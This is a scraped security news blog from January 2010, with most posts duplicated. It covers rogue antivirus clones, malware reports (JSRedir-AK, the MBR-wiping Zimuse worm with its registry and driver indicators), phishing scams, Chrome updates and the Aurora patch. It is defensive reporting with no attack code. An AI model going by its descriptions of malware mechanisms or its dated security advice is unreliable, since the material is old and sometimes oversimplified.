LiveEnterpriseSuite will detect false infections and require a license to remove them.
If your computer is infected with this malware, you should remove it soon, Click Here to learn how to remove such malwares.
Popular Posts
Wednesday, January 27, 2010
New Rogue: LiveEnterpriseSuite
LiveEnterpriseSuite is a clone of InternetAntivirusPRO. Actually, the only thing that the authors of this rogue have changed is the name in the GUI.
LiveEnterpriseSuite will detect false infections and require a license to remove them.
If your computer is infected with this malware, you should remove it soon, Click Here to learn how to remove such malwares.
LiveEnterpriseSuite will detect false infections and require a license to remove them.
If your computer is infected with this malware, you should remove it soon, Click Here to learn how to remove such malwares.
Google Media Player under development
Google has confirmed that it’s future operating system Chrome OS will have an integrated media player that will offer basic codec support , so that users can directly play audio or video files from Gmail or from USB drives or other media devices.
In an interview with Ars Technica, Matthew Papakipos, the lead engineering director for the Chrome OS project, shared that Chrome OS will have a complete media player that approximates the functionality of Windows Media Player.
So it seems that Chrome OS is heading in the right direction, although Chrome OS will be based, but every user will not always be connected to the internet.So users also need to be able to play videos, MP3s, PDFs and other stuff when they’re offline.
In an interview with Ars Technica, Matthew Papakipos, the lead engineering director for the Chrome OS project, shared that Chrome OS will have a complete media player that approximates the functionality of Windows Media Player.
Another big aspect to what we’re doing is we’re integrating a whole media player into Chrome and into Chrome OS. People often get confused about this, and it’s a fairly subtle but important point. Because in a sense what we’re doing is integrating the equivalent of Windows Media Player into Chrome itself.
So it seems that Chrome OS is heading in the right direction, although Chrome OS will be based, but every user will not always be connected to the internet.So users also need to be able to play videos, MP3s, PDFs and other stuff when they’re offline.
Google Chrome 4 – now with Extensions, Take Care!!!
With the latest release of their browser, v.4.0, Google has published a long expected feature: Browser Extensions. Now Chrome features what other browsers like Firefox, IE, Opera and so on offer for a long time already.
But, being able to compete with the others better doesn’t mean that they have solved all problems. Actually, their problems just start to appear – because adding extensions in the browser is just the same as opening Pandora’s box.
Anyone can write extensions and upload them in the Google Extension Gallery. Google doesn’t check in any way that the extensions are behaving correctly and do only “good” things.
As Aaron Boodman, Software Engineer at Google, posted in Chromium’s blog, extensions can bite: “If you’re using extensions now, you should keep in mind that they are powerful software. Extensions integrate with your browser, so they can access and change everything that happens in it. For example, the same technology that enables an extension to periodically check the number of messages in your Gmail inbox could also be used to read all your personal mail and tweet it to your mom! This can happen because of malicious intent or simply because of a bug.”
We strongly recommend to be very careful about what you install in the browser. It is better to install only extensions which are built by Google. This is usually specified in the extension name or description and if the email address of the author is @google.com (not gmail.com!). Also, make sure that the extension is rated high (should have at minimum 4 stars and been reviewed by at least 1000 users).
These extensions can not only do bad things to you (as mentioned by Aaron), but they can also affect the stability of the browser, deactivate other extensions or slow down the browsing. So, even if they are not built to be malicious, they can be wrongly programmed and result in equally malicious, non intended actions.
But, being able to compete with the others better doesn’t mean that they have solved all problems. Actually, their problems just start to appear – because adding extensions in the browser is just the same as opening Pandora’s box.
Anyone can write extensions and upload them in the Google Extension Gallery. Google doesn’t check in any way that the extensions are behaving correctly and do only “good” things.
As Aaron Boodman, Software Engineer at Google, posted in Chromium’s blog, extensions can bite: “If you’re using extensions now, you should keep in mind that they are powerful software. Extensions integrate with your browser, so they can access and change everything that happens in it. For example, the same technology that enables an extension to periodically check the number of messages in your Gmail inbox could also be used to read all your personal mail and tweet it to your mom! This can happen because of malicious intent or simply because of a bug.”
We strongly recommend to be very careful about what you install in the browser. It is better to install only extensions which are built by Google. This is usually specified in the extension name or description and if the email address of the author is @google.com (not gmail.com!). Also, make sure that the extension is rated high (should have at minimum 4 stars and been reviewed by at least 1000 users).
These extensions can not only do bad things to you (as mentioned by Aaron), but they can also affect the stability of the browser, deactivate other extensions or slow down the browsing. So, even if they are not built to be malicious, they can be wrongly programmed and result in equally malicious, non intended actions.
Loose Tweets Sink Fleets
It's especially bad for high-security organizations, like military agencies.
And it's now harder than ever, thanks to services such as Flickr, Photobucket, Facebook, Twitter and Myspace.
So, we worked together with Lewis Communications to submit a Freedom Of Information Act request to Ministry of Defence in UK, asking if they've had problems with this.
After waiting some weeks, we got a reply back, detailing that UK military personnel and Ministry of Defence staff have leaked secret information 16 times on social networking websites and Internet forums.
People might think they are confiding in friends or family when they go on Facebook, for example, but in fact they might be making information available to everybody. Such mistakes can happen especially now that Facebook has been modifying their privacy settings.
Here's Sky News' take on this.
"Loose Tweets Sink Fleets" Poster image credit: Brian Lane Winfield Moore
Local Trends comes to Twitter
The most popular micro blogging network ‘Twitter’ has now added local trends support. This new feature allows users to track Trending topics on twitter related to their region. Though, currently very less number of countries and cities added to it.
In twitter words:
Local Trends will allow you to learn more about the nuances in our world and discover even more relevant topics that might matter to you. We’ll be improving this feature over time to provide more locations, languages, and data through our API.
Don't forget to follow me @boelectronic on Twitter.
In twitter words:
Local Trends will allow you to learn more about the nuances in our world and discover even more relevant topics that might matter to you. We’ll be improving this feature over time to provide more locations, languages, and data through our API.
Don't forget to follow me @boelectronic on Twitter.
MS Office 2010 RTM Final Build 14.0.4734.1000 Escrow Release
Microsoft Corporation has almost started assembling the final build of Office 2010 aka (MS office 14) RTM version. As per the news leaked on Wzor, Development of OFFICE 2010 software package has come to its last stage.The build is codenamed as Escrow with build number 14.0.4734.1000
According to Wzor, This RTM Escrow Build 14.0.4734.1000 has already been circulated within Corporation and is available to company employees and partners. Few days before, when Build 14.0.4730.1007 was leaked on Torrent network, its EULA (License Agreement) read that its a RTM version but apparently it was just a Pre RTM build. Testers are still working on it and if there no problems, it will move to RTM version.
Here is a list of previously compiled builds:
14.0.4734.1000 RTM Escrow
14.0.4730.1007 pre-RTM Escrow
14.0.4730.1006
14.0.4709.1000
14.0.4702.1000
14.0.4615.1000
14.0.4605.1000
14.0.4536.1000
14.0.4517.1000
14.0.4514.1009 BETA-2
14.0.4514.1004
14.0.4514.1003
14.0.4417.1000 BETA-1
14.0.4302.1000 BETA-1
14.0.4006.1110
14.0.4006.1010 TECHNICAL PREVIEW
14.0.3524.1003
Microsoft quoted that Office 2010 RTM packages will be available from June 2010 but on contrary Wzor claims its launch on April 2010. Let’s see how much truth lies behind these statements.
According to Wzor, This RTM Escrow Build 14.0.4734.1000 has already been circulated within Corporation and is available to company employees and partners. Few days before, when Build 14.0.4730.1007 was leaked on Torrent network, its EULA (License Agreement) read that its a RTM version but apparently it was just a Pre RTM build. Testers are still working on it and if there no problems, it will move to RTM version.
Here is a list of previously compiled builds:
14.0.4734.1000 RTM Escrow
14.0.4730.1007 pre-RTM Escrow
14.0.4730.1006
14.0.4709.1000
14.0.4702.1000
14.0.4615.1000
14.0.4605.1000
14.0.4536.1000
14.0.4517.1000
14.0.4514.1009 BETA-2
14.0.4514.1004
14.0.4514.1003
14.0.4417.1000 BETA-1
14.0.4302.1000 BETA-1
14.0.4006.1110
14.0.4006.1010 TECHNICAL PREVIEW
14.0.3524.1003
Microsoft quoted that Office 2010 RTM packages will be available from June 2010 but on contrary Wzor claims its launch on April 2010. Let’s see how much truth lies behind these statements.
Tuesday, January 26, 2010
Troj/JSRedir-AK: 40% of a month’s malware
It has been a month since Sophos added detection for Troj/JSRedir-AK and figures generated today show that over 40% of all web-based detections have been from this malicious code.
[Graph shows Malware hosted on websites from 2009-12-22 11:00:00 to 2010-01-21 11:00:00 (GMT-8)]
Translating the numbers into a more human comprehensible form: 1 site every 15 secs was being detected as Troj/JSRedir-AK.
The affected sites include well-known names, including:
Using the JavaScript .replace the malware deobfuscates itself and dynamically writes an iframe point to a Russian website on port 8080 which serves up scripts detected as Troj/Iframe-DL.
This new script will write an iframe that will attempt to load a PDF (detected as Troj/PDFJs-FY) and a file claiming to be a JPG (detected as Exp/VidCtl-A). These then will install various other malware.
Troj/JSRedir-AK is a continuation of the Gumblar gang’s exploits using Russian domains instead of Chinese ones. In fact, the graph above is very similar to the one we saw for Troj/JSRedir-R and the infection mechanisms seem to be the same (i.e. FTP credentials).
[Graph shows Malware hosted on websites from 2009-12-22 11:00:00 to 2010-01-21 11:00:00 (GMT-8)]
Translating the numbers into a more human comprehensible form: 1 site every 15 secs was being detected as Troj/JSRedir-AK.
The affected sites include well-known names, including:
- Energy Companies
- Retail Companies
- Automobile Club
- Hotels
Using the JavaScript .replace the malware deobfuscates itself and dynamically writes an iframe point to a Russian website on port 8080 which serves up scripts detected as Troj/Iframe-DL.
This new script will write an iframe that will attempt to load a PDF (detected as Troj/PDFJs-FY) and a file claiming to be a JPG (detected as Exp/VidCtl-A). These then will install various other malware.
Troj/JSRedir-AK is a continuation of the Gumblar gang’s exploits using Russian domains instead of Chinese ones. In fact, the graph above is very similar to the one we saw for Troj/JSRedir-R and the infection mechanisms seem to be the same (i.e. FTP credentials).
New Rogue: APcSafe
APcSafe is another rogue anti-spyware clone of the WiniGuard family.
if your computer is infected with this malware you should remove it soon.
if your computer is infected with this malware you should remove it soon.
New Rogue: PcsSecure
PcsSecure is the latest cloned rogue antispyware from the WiniGuard family.
if your computer is infected with this malware you should remove it soon.
if your computer is infected with this malware you should remove it soon.
Google Chrome Stable Channel Update
The stable channel has been updated to 4.0.249.78 for Windows, and includes the following features and security fixes (since 3.0):
Security Fixes:
Please see the Chromium security page for more detail. Note that the referenced bugs may be kept private until a majority of our users are up to date with the fix.
- Extensions
- Bookmark sync
- Enhanced developer tools
- HTML5: Notifications, Web Database, Local Storage, WebSockets, Ruby support
- v8 performance improvements
- Skia performance improvements
- Full ACID3 pass, due to re-enabled remote font support (with added defense against bugs in operating system font libraries)
- HTTP byte range support
- New security feature: "Strict Transport Security" support
- Experimental new anti-reflected-XSS feature called "XSS Auditor"
Security Fixes:
Please see the Chromium security page for more detail. Note that the referenced bugs may be kept private until a majority of our users are up to date with the fix.
- [3275] Low Pop-up blocker bypass. Credit to Google Chrome Security Team (SkyLined).
- [9877] Medium Cross-domain theft due to CSS design error. Credit to Chris Evans of the Google Security Team.
- [12523] Medium Browser memory error with stale pop-up block menu. Credit to Jacob Balle and Carsten Eiram, Secunia Research.
- [20450] Low Prevent XHR to directories. Credit to the Chromium development community.
- [23693] Low Escape more characters in shortcuts. Credit to Michal Zalewski of the Google Security Team and, independently, Inferno of SecureThoughts.com.
- [8864] [24701] [24646] High Renderer memory errors drawing on canvases. Credit to Michal Zalewski of the Google Security Team and Google Chrome Security Team (SkyLined).
- [28566] High Image decoding memory error. Credit to Robert Swiecki of the Google Security Team.
- [29920] Low Corner case failure to strip Referer. Credit to the Chromium development community.
- [30666] High Cross-domain access error. Credit to Tokuji Akamine, Senior Consultant at Symantec Consulting Services.
- [31307] High Bitmap deserialization error. Credit to Mark Dowd, under contract to Google Chrome Security Team.
- [31517] Low Browser crash with nested URL.
Google Toolbar tracks searches after it’s disabled.
Ben Edelman, Harvard privacy researcher and guru has revisited the features of Google Toolbar and was appalled to discover that disabling it doesn’t really disable it. He is recommending that all users uninstall it.
In a long, thorough and well-written piece on his blog Edelman discusses how he monitored the Toolbar’s behavior with a network sniffer and documented the transmission of data back to Google (to toolbarqueries.google.com). Not only does it track a user’s Google searches, but it also phones home information about searches done in other search engines.
And, the privacy policy, he says, is “inept.”
“Notice that the Privacy Policy loads in an unusual window with no browser chrome – no Edit-Find option to let a user search for words of particular interest, no Edit-Select All and Edit-Copy option to let a user copy text to another program for further review, no Save or Print options to let a user preserve the file. Had Google used a standard browser window, all these features would have been available, but by designing this nonstandard window, Google creates all these limitations.”
This, of course, prevents a user from using an application like EULAlyzer that points out areas of concern in end user licensing agreements and privacy statements.
His conclusions about what Google should do:
“When a user disables Google Toolbar, all Enhanced Features transmissions need to stop, immediately and without exception. This change must be deployed to all Google Toolbar users straightaway....”
“Google also needs to clean up the results of its nonconsensual data collection. In particular, Google has collected browsing data from users who specifically declined to allow such data to be collected....”
“But these records never should have been sent to Google in the first place. So Google should find a way to let concerned users request that Google fully and irreversibly delete their entire Toolbar histories.
“The current Toolbar installation sequence suffers inconsistent statements of privacy consequences, with poor presentation of the full Toolbar Privacy Statement. Toolbar puts a button on users’ Taskbar unrequested. And as my videos show, once Google puts its code on a user’s computer, there’s nothing to stop Google from tracking users even after users specifically decline. I’ve run Google Toolbar for nearly a decade, but this week I uninstalled Google Toolbar from all my PCs. I encourage others to do the same.”
In a long, thorough and well-written piece on his blog Edelman discusses how he monitored the Toolbar’s behavior with a network sniffer and documented the transmission of data back to Google (to toolbarqueries.google.com). Not only does it track a user’s Google searches, but it also phones home information about searches done in other search engines.
And, the privacy policy, he says, is “inept.”
“Notice that the Privacy Policy loads in an unusual window with no browser chrome – no Edit-Find option to let a user search for words of particular interest, no Edit-Select All and Edit-Copy option to let a user copy text to another program for further review, no Save or Print options to let a user preserve the file. Had Google used a standard browser window, all these features would have been available, but by designing this nonstandard window, Google creates all these limitations.”
This, of course, prevents a user from using an application like EULAlyzer that points out areas of concern in end user licensing agreements and privacy statements.
His conclusions about what Google should do:
“When a user disables Google Toolbar, all Enhanced Features transmissions need to stop, immediately and without exception. This change must be deployed to all Google Toolbar users straightaway....”
“Google also needs to clean up the results of its nonconsensual data collection. In particular, Google has collected browsing data from users who specifically declined to allow such data to be collected....”
“But these records never should have been sent to Google in the first place. So Google should find a way to let concerned users request that Google fully and irreversibly delete their entire Toolbar histories.
“The current Toolbar installation sequence suffers inconsistent statements of privacy consequences, with poor presentation of the full Toolbar Privacy Statement. Toolbar puts a button on users’ Taskbar unrequested. And as my videos show, once Google puts its code on a user’s computer, there’s nothing to stop Google from tracking users even after users specifically decline. I’ve run Google Toolbar for nearly a decade, but this week I uninstalled Google Toolbar from all my PCs. I encourage others to do the same.”
Virus Writers Produce Hardware Damaging Code with Win32.Worm.Zimuse
Disguised IQ test combines virus, rootkit and worm -- malicious code for one fatal formula
BitDefender today identified a new e-threat that combines the destructive behavior of a virus with the spreading mechanisms of a worm. There are two known variants of this virus, which enters the computer as a harmless IQ test.
Once executed, the worm creates between seven and eleven copies of itself (depending on the variant) in critical areas of the Windows system.
Win32.Worm.Zimuse.A is an extremely dangerous piece of malware. Unlike average worms, Win32.Worm.Zimuse.A could lead to severe data loss as it overwrites the first 50 KB of the Master Boot Record - a key zone of the hard disk drive.
In order to execute on each Windows boot-up, the worm sets the following registry entry:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"Dump"="%programfiles%\Dump\Dump.exe
It also creates two driver files, namely:
%system%\drivers\Mstart.sys and %system%\drivers\Mseu.sys
Since 64-bit versions of Windows Vista and Windows 7 require digitally signed drivers, the worm would fail installing these files.
Unfortunately, in its early stages, this worm makes it nearly impossible for users to know their system has fallen victim to the e-threat. If a certain number of days have elapsed since the infection (40 days for variant A and 20 days for variant B), the computer user receives an error message stating that a problem has occurred due to malicious content in IP packets from a peculiar-looking web address. It then asks the user to recover the system by pressing “OK.” After this message, the next restart causes the computer’s hard disk to become damaged due to the compromised boot sector. To view a video detailing what occurs during an attack by Win32.Worm.Zimuse.A, please click here.
In order to stay safe, download and install an antivirus, antispyware and firewall and keep using them updated always. Users should also employ extra caution when prompted to open files from unfamiliar locations.
BitDefender today identified a new e-threat that combines the destructive behavior of a virus with the spreading mechanisms of a worm. There are two known variants of this virus, which enters the computer as a harmless IQ test.
Once executed, the worm creates between seven and eleven copies of itself (depending on the variant) in critical areas of the Windows system.
Win32.Worm.Zimuse.A is an extremely dangerous piece of malware. Unlike average worms, Win32.Worm.Zimuse.A could lead to severe data loss as it overwrites the first 50 KB of the Master Boot Record - a key zone of the hard disk drive.
In order to execute on each Windows boot-up, the worm sets the following registry entry:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"Dump"="%programfiles%\Dump\Dump.exe
It also creates two driver files, namely:
%system%\drivers\Mstart.sys and %system%\drivers\Mseu.sys
Since 64-bit versions of Windows Vista and Windows 7 require digitally signed drivers, the worm would fail installing these files.
Unfortunately, in its early stages, this worm makes it nearly impossible for users to know their system has fallen victim to the e-threat. If a certain number of days have elapsed since the infection (40 days for variant A and 20 days for variant B), the computer user receives an error message stating that a problem has occurred due to malicious content in IP packets from a peculiar-looking web address. It then asks the user to recover the system by pressing “OK.” After this message, the next restart causes the computer’s hard disk to become damaged due to the compromised boot sector. To view a video detailing what occurs during an attack by Win32.Worm.Zimuse.A, please click here.
In order to stay safe, download and install an antivirus, antispyware and firewall and keep using them updated always. Users should also employ extra caution when prompted to open files from unfamiliar locations.
Monday, January 25, 2010
Desktop Security 2010
Desktop Security 2010 is a rogue antispyware program, designed to trick people into thinking it is a legitimate program. Desktop Security 2010 uses fake security warnings and system scans to frighten people into buying the software. If Desktop Security 2010 is installed on your PC, you should remove it immediately as it is a potentially dangerous computer infection.
Computers that have been infected with Desktop Security 2010 may show the following symptoms:
If Desktop Security 2010 has infected your computer, you must remove it soon.
Computers that have been infected with Desktop Security 2010 may show the following symptoms:
- System scans that report numerous infections, yet requires purchase of System Defender before it will remove the infections (These are fictitious scan results)
- Alerts and Pop-Up system warnings stating the PC is infected and recommend purchase of System Defender (These warnings are fake)
- Web browser redirecting to random websites (these websites are owned by cyber thieves and will further infect your PC)
- System Defender will prevent other programs from opening, stating they are infected (The programs are not infected)
If Desktop Security 2010 has infected your computer, you must remove it soon.
Hotmail password phishing again
I am a very lucky guy.
In fact, I must be the luckiest person in the world since spammers like to send all kinds of lucky spam to me.
These days, I get inundated with lucky spam. The last spam I had, I got offered a free gift card if I purchased some Viagra from them. Wow.
On other days, asking me to lose my weight results in instant chances of winning a lottery at the same time and all of this is due to my lucky email address.
But before I can get my lucky email address, they first need to verify my hotmail account.
Not a problem, right?
Not so fast, Speedy Gonzales. A quick observation by moving my mouse over the displayed link shows that the real link is in fact different from that which is being shown.
Although the login page looks the same as a Window Live page, I don’t think Microsoft is that broke to host its website under another user’s /albums/userpics/ hotmail-au/ web address folder.
Obviously, this is a password phishing spam that specifically targets Hotmail, which is similar to the Hotmail Password Scam Continuing phishing campaign we reported a while back.
So, I strongly advise customers to be careful of this kind of phishing emails when clicking links in emails and using web-based email services.
Remember, you may be still not be lucky as me, but at least you won’t get your hotmail account compromised.
Good Luck :)
In fact, I must be the luckiest person in the world since spammers like to send all kinds of lucky spam to me.
These days, I get inundated with lucky spam. The last spam I had, I got offered a free gift card if I purchased some Viagra from them. Wow.
On other days, asking me to lose my weight results in instant chances of winning a lottery at the same time and all of this is due to my lucky email address.
But before I can get my lucky email address, they first need to verify my hotmail account.
Not a problem, right?
Not so fast, Speedy Gonzales. A quick observation by moving my mouse over the displayed link shows that the real link is in fact different from that which is being shown.
Although the login page looks the same as a Window Live page, I don’t think Microsoft is that broke to host its website under another user’s /albums/userpics/ hotmail-au/ web address folder.
Obviously, this is a password phishing spam that specifically targets Hotmail, which is similar to the Hotmail Password Scam Continuing phishing campaign we reported a while back.
So, I strongly advise customers to be careful of this kind of phishing emails when clicking links in emails and using web-based email services.
Remember, you may be still not be lucky as me, but at least you won’t get your hotmail account compromised.
Good Luck :)
Adobe Flash 10.1 Will Get Private Browsing Mode
Adobe Flash is a well well known plugin used today by most of the internet users. Its next upgrade i.e version 10.1 will get private browsing support. Flash player will now automatically clean all flash history of your computer once you end the session. It will use the same technique as used in browsers supporting private browsing.
As you end the session the browsers in private mode automatically clears cookies, history and data, similarly flash will also remove any user password, login information or data stored that were associated while working in flash environment.
While using the private mode even flash games and applications will not be able to access your browser data and history. You can access your microphone and camera as normal but you cannot increase your storage limit while in private mode. Presently only browsers supporting private browsing will be able to integrate with its new features.
Supported Browsers
Browsers currently supported by the new Adobe version are:
Adobe has also announced support for future versions of Safari.
This new function of adobe will help you keep more tight security of your privacy. There is a developer pre-release, complete version may be released in first half of this Year.
For more information visit: Adobe Labs
As you end the session the browsers in private mode automatically clears cookies, history and data, similarly flash will also remove any user password, login information or data stored that were associated while working in flash environment.
While using the private mode even flash games and applications will not be able to access your browser data and history. You can access your microphone and camera as normal but you cannot increase your storage limit while in private mode. Presently only browsers supporting private browsing will be able to integrate with its new features.
Supported Browsers
Browsers currently supported by the new Adobe version are:
- Mozilla Firefox 3.5 and above.
- Internet Explorer 8.0 and above.
- Google Chrome 1.0 and above.
Adobe has also announced support for future versions of Safari.
This new function of adobe will help you keep more tight security of your privacy. There is a developer pre-release, complete version may be released in first half of this Year.
For more information visit: Adobe Labs
Saturday, January 23, 2010
Nude Pictures of Senator Scott Brown Arouse New Virus Concerns
False images from Cosmopolitan infect computers with fake antivirus product
BitDefender today warned of a new threat following the flood of interest in the result of the January 19th Massachusetts elections.
The day after his winning Senate campaign, nude pictures of Cosmopolitan’s Sexiest Man of 1982 Scott Brown not only stirred women’s imaginations, but also got the interest of malware creators. The latter exploited the news to spread a fake antivirus: Trojan.FakeAV.XP. Instead of spicy pictures, the targeted user received messages of false infections on their computer and prompts to buy a fake antivirus product.
This is the second attack to take advantage of sudden interest in Scott Brown. The first was a massive wave of infections in the US due to Trojan.FakeAV.ABT. Data provided by BitDefender's Real-Time Virus Reporting System shows that in North America, the number of systems infected with this Trojan, increased just before the elections day (January 18th) by almost 8 percent, while the number of infected files raised by nearly 13 percent.
In the last two days, the number of infected systems also grew in locations around the globe. In Canada, they increased by 62 percent on January 19th and by 14 percent on January 20th. The same ascending trend for infections was observed in the UK. The number of infected systems there grew by more than 29 percent, while the number of the infected files grew by almost 53 percent. In France, the number of infected systems increased by 23 percent, while the number of the infected files increased by about 32 percent. In Romania, the numbers also climbed, with infected systems rising by more than 11 percent.
The rogue antivirus resembles the program suite from the operating system. Once onto the user’s system, it creates a start-up registry value, "Enterprise Suite", in order to run every time the operating system starts. It damages the content of several systems files, delivering pop-up windows with fake infections, while requiring the user to buy a license for it.
To protect and avoid compromising systems and data:
1. First and foremost, have legitimate antivirus software installed
2. Install and activate a reliable antimalware, firewall solution and spam filter
3. Do not download software that claims to be free or anything else unless you completely trust the source
4. Don’t get fooled by fake video players that require “codecs” and Web scanners that pretend to disinfect your computer
5. Always scan your downloads before launching them
BitDefender today warned of a new threat following the flood of interest in the result of the January 19th Massachusetts elections.
The day after his winning Senate campaign, nude pictures of Cosmopolitan’s Sexiest Man of 1982 Scott Brown not only stirred women’s imaginations, but also got the interest of malware creators. The latter exploited the news to spread a fake antivirus: Trojan.FakeAV.XP. Instead of spicy pictures, the targeted user received messages of false infections on their computer and prompts to buy a fake antivirus product.
This is the second attack to take advantage of sudden interest in Scott Brown. The first was a massive wave of infections in the US due to Trojan.FakeAV.ABT. Data provided by BitDefender's Real-Time Virus Reporting System shows that in North America, the number of systems infected with this Trojan, increased just before the elections day (January 18th) by almost 8 percent, while the number of infected files raised by nearly 13 percent.
In the last two days, the number of infected systems also grew in locations around the globe. In Canada, they increased by 62 percent on January 19th and by 14 percent on January 20th. The same ascending trend for infections was observed in the UK. The number of infected systems there grew by more than 29 percent, while the number of the infected files grew by almost 53 percent. In France, the number of infected systems increased by 23 percent, while the number of the infected files increased by about 32 percent. In Romania, the numbers also climbed, with infected systems rising by more than 11 percent.
The rogue antivirus resembles the program suite from the operating system. Once onto the user’s system, it creates a start-up registry value, "Enterprise Suite", in order to run every time the operating system starts. It damages the content of several systems files, delivering pop-up windows with fake infections, while requiring the user to buy a license for it.
To protect and avoid compromising systems and data:
1. First and foremost, have legitimate antivirus software installed
2. Install and activate a reliable antimalware, firewall solution and spam filter
3. Do not download software that claims to be free or anything else unless you completely trust the source
4. Don’t get fooled by fake video players that require “codecs” and Web scanners that pretend to disinfect your computer
5. Always scan your downloads before launching them
Friday, January 22, 2010
404 error message spoof
Some questionable sites associated with the Winigard family of rogue security products pulls it from this location, which appears to belong to a graphic designer in Canada.
It’s funny and here’s waaaay too much truth there:
It’s funny and here’s waaaay too much truth there:
Smutty Searches Scuppered
Symantec Security Response has repeatedly warned that looking for free movies and videos online often results in malware infection, and here we go again with yet another example. We recently became aware of a campaign, centered around the YouTube Web site, to trick users into following malicious links.
YouTube is one of the most popular video sharing sites and therefore is often picked by online criminals hoping for an easy catch. Performing a search using a (generally female) celebrity’s name followed by "sex tape" or a recent movie name yields results such as the following:
Unfortunately, clicking the links highlighted in red in the above screenshots will not lead to the desired footage of Ms. Hudgens or the movie Angels and Demons. In place of what would have been the video is a message from the poster stating that they cannot upload the video because it would be deleted by YouTube, it is too big to host on YouTube, or other such excuses. However, the poster kindly places a bit.ly link on the page and claims that the full video is only a single click away:
There is some variation in the bit.ly links but they all point to a single malicious Web site that attempts to hoist malware onto the user’s computer. Youtube.com is aware of such attacks and is constantly battling to ensure that the videos and accounts being used are quickly taken offline. But with 20 hours of video being uploaded to Youtube.com every minute this is no easy task and some may slip through the cracks. This attack is well orchestrated, with numerous new videos with different search terms being uploaded on a daily basis to replace accounts and videos being taken offline.
For users of Symantec products with IPS capabilities, this is as far as the attempted attack goes. The IPS signature HTTP Misleading Application Download Request blocks access to the malicious site and the threat never hits the computer.
Those who do not have IPS-enabled products will be asked to download and execute a file in order to watch the video:
Symantec products currently detect the downloaded file as Trojan.FakeAV, although further analysis of the file is underway. As ever, we urge users to keep their virus definitions up-to-date to stay abreast of these attacks.
YouTube is one of the most popular video sharing sites and therefore is often picked by online criminals hoping for an easy catch. Performing a search using a (generally female) celebrity’s name followed by "sex tape" or a recent movie name yields results such as the following:
Unfortunately, clicking the links highlighted in red in the above screenshots will not lead to the desired footage of Ms. Hudgens or the movie Angels and Demons. In place of what would have been the video is a message from the poster stating that they cannot upload the video because it would be deleted by YouTube, it is too big to host on YouTube, or other such excuses. However, the poster kindly places a bit.ly link on the page and claims that the full video is only a single click away:
There is some variation in the bit.ly links but they all point to a single malicious Web site that attempts to hoist malware onto the user’s computer. Youtube.com is aware of such attacks and is constantly battling to ensure that the videos and accounts being used are quickly taken offline. But with 20 hours of video being uploaded to Youtube.com every minute this is no easy task and some may slip through the cracks. This attack is well orchestrated, with numerous new videos with different search terms being uploaded on a daily basis to replace accounts and videos being taken offline.
For users of Symantec products with IPS capabilities, this is as far as the attempted attack goes. The IPS signature HTTP Misleading Application Download Request blocks access to the malicious site and the threat never hits the computer.
Those who do not have IPS-enabled products will be asked to download and execute a file in order to watch the video:
Symantec products currently detect the downloaded file as Trojan.FakeAV, although further analysis of the file is underway. As ever, we urge users to keep their virus definitions up-to-date to stay abreast of these attacks.
iPhish - fake iPhone warranty steals info
This week we’ve seen a spam campaign aimed at separating unsuspecting users from their iPhone details.
Messages have the subject “IMPORTANT: Your iPhone Warranty Extension for 1 Year!”, pretend to be sent from “iphonewarranty@apple.com”, and look as follows (click to enlarge the image):
Recipients who feel like they can’t let this limited-time too-good-to-be-true special offer pass them by will find themselves redirected to the following page:
All you have to do is enter your phone’s serial number and IMEI number, as well as its type and capacity, and you’ll be all set. Don’t know how to get any of these numbers? Not to worry, there’s a link to help you find them … which has the cheek to point to a real Apple support page. In fact all the links on this page point you to the real Apple website - this is partly to allay suspicion, but also simply because it’s easier for the authors to copy an area of the real site than to be selective or creative.
Entering your credentials (no, I didn’t give them any real ones) takes you to this page:
Interestingly they don’t ask for some fairly basic information here - at no point do they want either your name or your phone number. There’s still a range of nefarious activities they could get up to though - one that springs to mind is that IMEI numbers are used by network providers to block connections from phones registered as stolen, so by harvesting details from live phones criminals might be able to launder stolen phones.
Whatever they plan to do with your iPhone details, it’s not going to be good. You’re enticed in with a warranty, but the only thing you’re going to get is ripped off.
Messages have the subject “IMPORTANT: Your iPhone Warranty Extension for 1 Year!”, pretend to be sent from “iphonewarranty@apple.com”, and look as follows (click to enlarge the image):
Recipients who feel like they can’t let this limited-time too-good-to-be-true special offer pass them by will find themselves redirected to the following page:
All you have to do is enter your phone’s serial number and IMEI number, as well as its type and capacity, and you’ll be all set. Don’t know how to get any of these numbers? Not to worry, there’s a link to help you find them … which has the cheek to point to a real Apple support page. In fact all the links on this page point you to the real Apple website - this is partly to allay suspicion, but also simply because it’s easier for the authors to copy an area of the real site than to be selective or creative.
Entering your credentials (no, I didn’t give them any real ones) takes you to this page:
Interestingly they don’t ask for some fairly basic information here - at no point do they want either your name or your phone number. There’s still a range of nefarious activities they could get up to though - one that springs to mind is that IMEI numbers are used by network providers to block connections from phones registered as stolen, so by harvesting details from live phones criminals might be able to launder stolen phones.
Whatever they plan to do with your iPhone details, it’s not going to be good. You’re enticed in with a warranty, but the only thing you’re going to get is ripped off.
Now you too can mount your own Operation Aurora Attacks!!!
But don’t. Please don’t!… just…. don’t!…
Instead, why don’t you apply the out-of-band patch ( MS10-002 ) that Microsoft has just released…?!!!
Patching remote-code-execution vulnerabilities is usually “a good idea” to say the least. But, considering that:
Microsoft rushed to get this patch out…… ( Thank you Microsoft! )
And that, this patch addresses several Internet Explorer vulnerabilities - of which includes CVE-2010-0249 - the infamous “Aurora attacks” related vulnerability that’s well known to be making the rounds in the wild.
Annnnd that, the Metasploit framework has released an update that can generate attacks based on this….. Which means that every script-kiddy / pentester / disgruntled-monkey-with-a-laptop can mount their own little mini operation Aurora-like attacks.
Annnnnnd that, Microsoft has posted an advisory about an unpatched elevation of privilege attack that affects most Windows NT platforms ( from Windows NT 3.1 to, and including, Windows 7 ) - which there is proof-of-concept code now publicly available for…..
Just Update your windows using Microsoft Update!
Instead, why don’t you apply the out-of-band patch ( MS10-002 ) that Microsoft has just released…?!!!
Patching remote-code-execution vulnerabilities is usually “a good idea” to say the least. But, considering that:
Microsoft rushed to get this patch out…… ( Thank you Microsoft! )
And that, this patch addresses several Internet Explorer vulnerabilities - of which includes CVE-2010-0249 - the infamous “Aurora attacks” related vulnerability that’s well known to be making the rounds in the wild.
Annnnd that, the Metasploit framework has released an update that can generate attacks based on this….. Which means that every script-kiddy / pentester / disgruntled-monkey-with-a-laptop can mount their own little mini operation Aurora-like attacks.
Annnnnnd that, Microsoft has posted an advisory about an unpatched elevation of privilege attack that affects most Windows NT platforms ( from Windows NT 3.1 to, and including, Windows 7 ) - which there is proof-of-concept code now publicly available for…..
Just Update your windows using Microsoft Update!
